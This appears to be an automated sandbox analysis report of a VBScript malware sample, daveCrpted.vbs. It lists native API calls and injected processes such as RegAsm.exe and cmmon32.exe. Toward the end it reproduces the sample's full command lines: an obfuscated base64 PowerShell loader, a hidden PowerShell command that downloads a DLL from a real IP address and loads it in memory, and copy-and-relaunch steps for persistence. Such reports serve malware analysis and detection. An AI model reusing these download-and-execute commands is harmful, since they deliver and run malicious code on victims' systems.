Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031922AE 24_2_031922AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030CF900 24_2_030CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030E4120 24_2_030E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03181002 24_2_03181002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0319E824 24_2_0319E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030DB090 24_2_030DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030F20A0 24_2_030F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031920A8 24_2_031920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031928EC 24_2_031928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03191FF1 24_2_03191FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0318D616 24_2_0318D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030E6E30 24_2_030E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03192EF7 24_2_03192EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03192D07 24_2_03192D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030C0D20 24_2_030C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03191D55 24_2_03191D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030F2581 24_2_030F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031925DD 24_2_031925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030DD5E0 24_2_030DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030D841F 24_2_030D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0318D466 24_2_0318D466
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FC902 37_2_0D3FC902
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FF302 37_2_0D3FF302
Source: C:\Windows\explorer.exe Code function: 37_2_0D403D02 37_2_0D403D02
Source: C:\Windows\explorer.exe Code function: 37_2_0D402F06 37_2_0D402F06
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FD362 37_2_0D3FD362
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FD359 37_2_0D3FD359
Source: C:\Windows\explorer.exe Code function: 37_2_0D4017B2 37_2_0D4017B2
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FF2FF 37_2_0D3FF2FF
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FC8FB 37_2_0D3FC8FB
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02B6B150 appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041A960 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 030CB150 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041AA90 appears 38 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 0476B150 appears 72 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418AA0 NtCreateFile, 9_2_00418AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418B50 NtReadFile, 9_2_00418B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418BD0 NtClose, 9_2_00418BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418C80 NtAllocateVirtualMemory, 9_2_00418C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418A9A NtCreateFile, 9_2_00418A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418BCA NtReadFile, 9_2_00418BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A20 NtResumeThread,LdrInitializeThunk, 9_2_02BA9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_02BA9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A50 NtCreateFile,LdrInitializeThunk, 9_2_02BA9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA98F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_02BA98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_02BA9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9840 NtDelayExecution,LdrInitializeThunk, 9_2_02BA9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA99A0 NtCreateSection,LdrInitializeThunk, 9_2_02BA99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_02BA9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_02BA96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_02BA9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA97A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_02BA97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9780 NtMapViewOfSection,LdrInitializeThunk, 9_2_02BA9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9FE0 NtCreateMutant,LdrInitializeThunk, 9_2_02BA9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9710 NtQueryInformationToken,LdrInitializeThunk, 9_2_02BA9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA95D0 NtClose,LdrInitializeThunk, 9_2_02BA95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9540 NtReadFile,LdrInitializeThunk, 9_2_02BA9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A80 NtOpenDirectoryObject, 9_2_02BA9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A10 NtQuerySection, 9_2_02BA9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAA3B0 NtGetContextThread, 9_2_02BAA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9B00 NtSetValueKey, 9_2_02BA9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA98A0 NtWriteVirtualMemory, 9_2_02BA98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9820 NtEnumerateKey, 9_2_02BA9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAB040 NtSuspendThread, 9_2_02BAB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA99D0 NtCreateProcessEx, 9_2_02BA99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9950 NtQueueApcThread, 9_2_02BA9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA96D0 NtCreateKey, 9_2_02BA96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9610 NtEnumerateValueKey, 9_2_02BA9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9670 NtQueryInformationProcess, 9_2_02BA9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9650 NtQueryValueKey, 9_2_02BA9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9730 NtQueryVirtualMemory, 9_2_02BA9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAA710 NtOpenProcessToken, 9_2_02BAA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9770 NtSetInformationFile, 9_2_02BA9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAA770 NtOpenThread, 9_2_02BAA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9760 NtOpenProcess, 9_2_02BA9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA95F0 NtQueryInformationFile, 9_2_02BA95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAAD30 NtSetContextThread, 9_2_02BAAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9520 NtWaitForSingleObject, 9_2_02BA9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9560 NtWriteFile, 9_2_02BA9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9540 NtReadFile,LdrInitializeThunk, 23_2_047A9540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A95D0 NtClose,LdrInitializeThunk, 23_2_047A95D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_047A9660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9650 NtQueryValueKey,LdrInitializeThunk, 23_2_047A9650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_047A96E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A96D0 NtCreateKey,LdrInitializeThunk, 23_2_047A96D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9710 NtQueryInformationToken,LdrInitializeThunk, 23_2_047A9710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9FE0 NtCreateMutant,LdrInitializeThunk, 23_2_047A9FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9780 NtMapViewOfSection,LdrInitializeThunk, 23_2_047A9780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_047A9860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9840 NtDelayExecution,LdrInitializeThunk, 23_2_047A9840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_047A9910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A99A0 NtCreateSection,LdrInitializeThunk, 23_2_047A99A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A50 NtCreateFile,LdrInitializeThunk, 23_2_047A9A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9560 NtWriteFile, 23_2_047A9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AAD30 NtSetContextThread, 23_2_047AAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9520 NtWaitForSingleObject, 23_2_047A9520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A95F0 NtQueryInformationFile, 23_2_047A95F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9670 NtQueryInformationProcess, 23_2_047A9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9610 NtEnumerateValueKey, 23_2_047A9610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AA770 NtOpenThread, 23_2_047AA770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9770 NtSetInformationFile, 23_2_047A9770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9760 NtOpenProcess, 23_2_047A9760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9730 NtQueryVirtualMemory, 23_2_047A9730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AA710 NtOpenProcessToken, 23_2_047AA710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A97A0 NtUnmapViewOfSection, 23_2_047A97A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AB040 NtSuspendThread, 23_2_047AB040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9820 NtEnumerateKey, 23_2_047A9820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A98F0 NtReadVirtualMemory, 23_2_047A98F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A98A0 NtWriteVirtualMemory, 23_2_047A98A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9950 NtQueueApcThread, 23_2_047A9950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A99D0 NtCreateProcessEx, 23_2_047A99D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A20 NtResumeThread, 23_2_047A9A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A10 NtQuerySection, 23_2_047A9A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A00 NtProtectVirtualMemory, 23_2_047A9A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A80 NtOpenDirectoryObject, 23_2_047A9A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9B00 NtSetValueKey, 23_2_047A9B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AA3B0 NtGetContextThread, 23_2_047AA3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218B50 NtReadFile, 23_2_03218B50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218BD0 NtClose, 23_2_03218BD0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218AA0 NtCreateFile, 23_2_03218AA0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218C80 NtAllocateVirtualMemory, 23_2_03218C80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218BCA NtReadFile, 23_2_03218BCA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218A9A NtCreateFile, 23_2_03218A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418AA0 NtCreateFile, 24_2_00418AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418B50 NtReadFile, 24_2_00418B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418BD0 NtClose, 24_2_00418BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418C80 NtAllocateVirtualMemory, 24_2_00418C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418A9A NtCreateFile, 24_2_00418A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418BCA NtReadFile, 24_2_00418BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_03109910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_03109860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109FE0 NtCreateMutant,LdrInitializeThunk, 24_2_03109FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_03109660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031096E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_031096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031095D0 NtClose,LdrInitializeThunk, 24_2_031095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109B00 NtSetValueKey, 24_2_03109B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310A3B0 NtGetContextThread, 24_2_0310A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A10 NtQuerySection, 24_2_03109A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A00 NtProtectVirtualMemory, 24_2_03109A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A20 NtResumeThread, 24_2_03109A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A50 NtCreateFile, 24_2_03109A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A80 NtOpenDirectoryObject, 24_2_03109A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109950 NtQueueApcThread, 24_2_03109950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031099A0 NtCreateSection, 24_2_031099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031099D0 NtCreateProcessEx, 24_2_031099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109820 NtEnumerateKey, 24_2_03109820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109840 NtDelayExecution, 24_2_03109840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310B040 NtSuspendThread, 24_2_0310B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031098A0 NtWriteVirtualMemory, 24_2_031098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031098F0 NtReadVirtualMemory, 24_2_031098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109710 NtQueryInformationToken, 24_2_03109710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310A710 NtOpenProcessToken, 24_2_0310A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109730 NtQueryVirtualMemory, 24_2_03109730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109770 NtSetInformationFile, 24_2_03109770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310A770 NtOpenThread, 24_2_0310A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109760 NtOpenProcess, 24_2_03109760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109780 NtMapViewOfSection, 24_2_03109780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031097A0 NtUnmapViewOfSection, 24_2_031097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109610 NtEnumerateValueKey, 24_2_03109610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109650 NtQueryValueKey, 24_2_03109650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109670 NtQueryInformationProcess, 24_2_03109670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031096D0 NtCreateKey, 24_2_031096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310AD30 NtSetContextThread, 24_2_0310AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109520 NtWaitForSingleObject, 24_2_03109520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109540 NtReadFile, 24_2_03109540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109560 NtWriteFile, 24_2_03109560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031095F0 NtQueryInformationFile, 24_2_031095F0
Java / VBScript file with very long strings (likely obfuscated code)
Source: daveCrpted.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: daveCrpted.vbs ReversingLabs: Detection: 12%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy 